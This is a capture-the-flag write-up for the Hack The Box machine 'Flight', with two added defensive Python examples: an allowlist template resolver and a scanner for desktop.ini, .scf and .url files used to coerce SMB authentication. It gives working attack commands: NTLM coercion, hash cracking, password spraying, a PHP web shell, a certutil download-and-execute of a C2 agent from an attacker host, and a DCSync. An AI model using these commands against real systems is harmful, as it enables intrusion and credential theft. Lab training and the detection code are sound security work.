Flight

Published: Jun 29, 2025

Enumeration

Scan

nmap -sC -sV -oN scans/detailed.nmap 10.10.11.187

Web

Going to flight.htb shows what seems to be a static site with no obvious attack surface.

Enumerating for subdomains:

ffuf -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --fs 7069

School Subdomain

This time, we notice that the server is using PHP, and the HTML content is being pulled in via the view URL parameter.

By pointing the view parameter at index.php, we can read the application's source code. It contains some sort of security filter.

Foothold

Responder

The filter on backslashes is there as an attempt to stop the attack we are about to perform. We will use an RFI to coerce the server into authenticating to an SMB server that we control to view a fake share, capturing the service account's NTLMv2 hash in the process. Let's use Responder to act as the malicious SMB server. We get around the filter by using forward slashes rather than backslashes, which Windows accepts in UNC paths just the same.
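
The filter described above is a blocklist, and the forward-slash bypass shows why blocklists fail for path handling. As an added example (not the site's PHP code; the template directory and view names are constructed), the following models that blocklist next to an allowlist with path containment, which rejects UNC paths, URLs and traversal regardless of which slash is used:

```python
"""Allowlist-based view resolution for a "?view=" style template loader.

Added example, not the school.flight.htb site's PHP code. It models the
blocklist the writeup describes (reject backslashes) next to an allowlist
with path containment. TEMPLATE_DIR and ALLOWED_VIEWS are constructed.
"""
import os
from typing import Optional

TEMPLATE_DIR = "/var/www/school/templates"            # hypothetical template location
ALLOWED_VIEWS = {"index", "about", "blog", "contact"}  # constructed allowlist


def blocklist_filter(view: str) -> bool:
    """The filter the writeup describes: accept anything without a backslash.

    Windows also accepts forward slashes in UNC paths, so this alone does not
    stop an include of //host/share/file, which is exactly the bypass above.
    """
    return "\\" not in view


def resolve_view(view: str) -> Optional[str]:
    """Map a view name to a template path, or None if it is not permitted.

    Two independent checks: the name must be on the allowlist, and the
    resolved path must stay inside TEMPLATE_DIR (realpath collapses "..").
    UNC paths, URLs, absolute paths and traversal all fail the first check;
    the second is defence in depth should the allowlist ever be relaxed.
    """
    if view not in ALLOWED_VIEWS:
        return None
    candidate = os.path.realpath(os.path.join(TEMPLATE_DIR, view + ".html"))
    root = os.path.realpath(TEMPLATE_DIR) + os.sep
    if not candidate.startswith(root):
        return None
    return candidate


def compare(view: str) -> dict:
    """Show how the two approaches treat one input."""
    return {"blocklist_accepts": blocklist_filter(view),
            "allowlist_resolves": resolve_view(view) is not None}


if __name__ == "__main__":
    for v in ("index", "index.php", "../../etc/passwd", "//10.10.14.11/share/x"):
        print(f"{v!r:28} {compare(v)}")
```

Running it shows the blocklist accepting `//10.10.14.11/share/x` while the allowlist only ever resolves the four known views; adding a page means adding its name to the allowlist, nothing else.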

Next, let's crack the hash offline with hashcat:

hashcat -m 5600 svc_apache.hash /usr/share/wordlists/rockyou.txt

The hash cracks pretty fast, giving us valid creds: svc_apache:S@Ss!K@*t13

After some poking around in SMB shares, we don’t find anything too interesting with these creds.

Password Spray

One thing we can try is to spray this password against all other users, testing for password reuse:

# Get user list
nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
# Spray after grabbing the user list
nxc smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

More valid creds: s.moon:S@Ss!K@*t13

Lateral Movement

NTLM Theft

With our new creds, let’s check our SMB access:

nxc smb 10.10.11.187 -u s.moon -p 'S@Ss!K@*t13' --shares

Now we have write access to the "Shared" share. Let's try a similar attack as before with Responder, but this time by uploading a file that triggers the authentication attempt.
To generate the payload, let’s use the following tool:
https://github.com/Greenwolf/ntlm_theft

python3 ntlm_theft.py --generate all --server 10.10.14.11 --filename evil

With Responder still running, we upload the desktop.ini payload to the "Shared" share.
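
From the defender's side, the desktop.ini just uploaded is detectable at rest: Explorer resolves the icon and URL fields of desktop.ini, .scf and .url files as soon as a folder is browsed, so a field pointing at a UNC or file:// path on an unknown host is the indicator. The scanner below is an added example (not part of the writeup or of ntlm_theft); the sample files, the trusted host name and the `example.invalid` URL are constructed:

```python
"""Scan a writable share for files that coerce SMB authentication.

Added example, not part of the writeup or of ntlm_theft. It flags the
INI-style artifacts that tool generates (desktop.ini, .scf, .url) whose icon
or URL fields reference a UNC or file:// path on a host outside an allowlist.
The sample files and host names below are constructed.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional, Set, Tuple

# Fields Explorer resolves automatically while rendering a folder listing.
AUTO_RESOLVED_KEYS = {"iconresource", "iconfile", "url"}
# \\host\..., //host/..., file://host/... (any number of slashes after file:)
UNC_OR_FILE = re.compile(r"^(?:\\\\|//|file:/+)([^\\/]+)", re.I)

Finding = Tuple[str, str, str]  # (file name, field, referenced host)


def is_candidate(name: str) -> bool:
    """Only the text-based file types these payloads use; .lnk is binary and out of scope here."""
    lower = name.lower()
    return lower == "desktop.ini" or lower.endswith((".scf", ".url"))


def extract_host(value: str) -> Optional[str]:
    """Return the host named by a UNC or file:// value, else None."""
    m = UNC_OR_FILE.match(value.strip())
    return m.group(1).lower() if m else None


def scan_file(path: str, trusted_hosts: Set[str]) -> List[Finding]:
    findings: List[Finding] = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            stripped = line.strip()
            if "=" not in stripped or stripped.startswith(("[", ";", "#")):
                continue  # section headers and comments carry no reference
            key, _, value = stripped.partition("=")
            if key.strip().lower() not in AUTO_RESOLVED_KEYS:
                continue
            host = extract_host(value)
            if host and host not in trusted_hosts:
                findings.append((os.path.basename(path), key.strip(), host))
    return findings


def scan_share(root: str, trusted_hosts: Set[str]) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if is_candidate(name):
                findings.extend(scan_file(os.path.join(dirpath, name), trusted_hosts))
    return findings


# Constructed contents standing in for what a scan of the "Shared" share might see.
SAMPLE_FILES: Dict[str, str] = {
    "desktop.ini": "[.ShellClassInfo]\nIconResource=\\\\10.10.14.11\\share\\evil.ico,0\n",
    "evil.url": "[InternetShortcut]\nURL=http://example.invalid\nIconFile=\\\\10.10.14.11\\share\\evil.ico\nIconIndex=1\n",
    "Corp.scf": "[Shell]\nCommand=2\nIconFile=\\\\fileserver.flight.htb\\icons\\corp.ico\n",
    "readme.txt": "IconFile=\\\\10.10.14.11\\ignored.ico\n",  # wrong file type, not scanned
}


def demo(trusted_hosts: Set[str] = frozenset({"fileserver.flight.htb"})) -> List[Finding]:
    """Write the constructed files into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as share:
        for name, content in SAMPLE_FILES.items():
            with open(os.path.join(share, name), "w") as fh:
                fh.write(content)
        return sorted(scan_share(share, set(trusted_hosts)))


if __name__ == "__main__":
    for finding in demo():
        print("suspicious reference:", finding)
```

The same logic fits a scheduled job over every writable share; the allowlist should contain the real file servers, and the Corp.scf entry shows why that matters, since legitimate shortcuts also use UNC icon paths.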

Cracking again with hashcat:

hashcat -m 5600 c.bum.hash /usr/share/wordlists/rockyou.txt

Creds: c.bum:Tikkycoll_431012284

Web Shell

With the new creds, we have write permissions on the web share:

nxc smb 10.10.11.187 -u c.bum -p 'Tikkycoll_431012284' --shares

Let’s upload a simple PHP shell as cmd.php to get RCE as svc_apache.
PHP code:

<?php system($_REQUEST['cmd']); ?>

Uploading:

Mythic

We will use Mythic to manage callbacks, with Apollo agents over a plain HTTP profile.
After building the Apollo agent, let's deliver the payload with a simple Python web server.
Commands:

# Download
curl 'http://school.flight.htb/cmd.php?cmd=certutil.exe+-urlcache+-f+-split+http://10.10.14.11:8000/apollo.exe+C:\\Windows\\Tasks\\apollo.exe'
# Execute
curl 'http://school.flight.htb/cmd.php?cmd=C:\\Windows\\Tasks\\apollo.exe'

And we get a callback!

Now, we can move laterally to the “c.bum” user with the creds we got previously.

shell icacls "C:\Windows\Tasks\apollo.exe" /grant Everyone:F
register_assembly # Pick RunasCs.exe
execute_assembly -Assembly "RunasCs.exe -Arguments c.bum Tikkycoll_431012284 C:\Windows\Tasks\apollo.exe"

This gives us a callback as "c.bum", which gives us user.txt.

Privilege Escalation

Enumeration

With some initial enumeration, we see that IIS is running on port 8000 and that we have write access to C:\inetpub\development:

shell netstat -ano | findstr LISTENING
shell icacls development

IIS Abuse

First, let's start a SOCKS proxy to access the internal site more easily.

# In Mythic:
socks5 7000

Adding FoxyProxy config:

Now we can access the internal IIS site from our browser:

A common way to abuse IIS is to upload an .aspx webshell, which we can do since we have write access. After using Mythic to upload the webshell, we navigate to it and get code execution as IIS APPPOOL\DefaultAppPool, a virtual account that we can use to get SYSTEM-level access. Let's get a new callback and then proceed with exploitation.

Let's use Rubeus to get a TGT.

This gives us a ticket in kirbi base64 format, so let’s convert it to ccache then use it to perform a DCSync to grab Administrator credentials.

cat ticket.kirbi.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
KRB5CCNAME=ticket.ccache faketime "$(ntpdate -q flight.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user Administrator -target-ip 10.10.11.187

Now we can simply use psexec to get a shell as SYSTEM.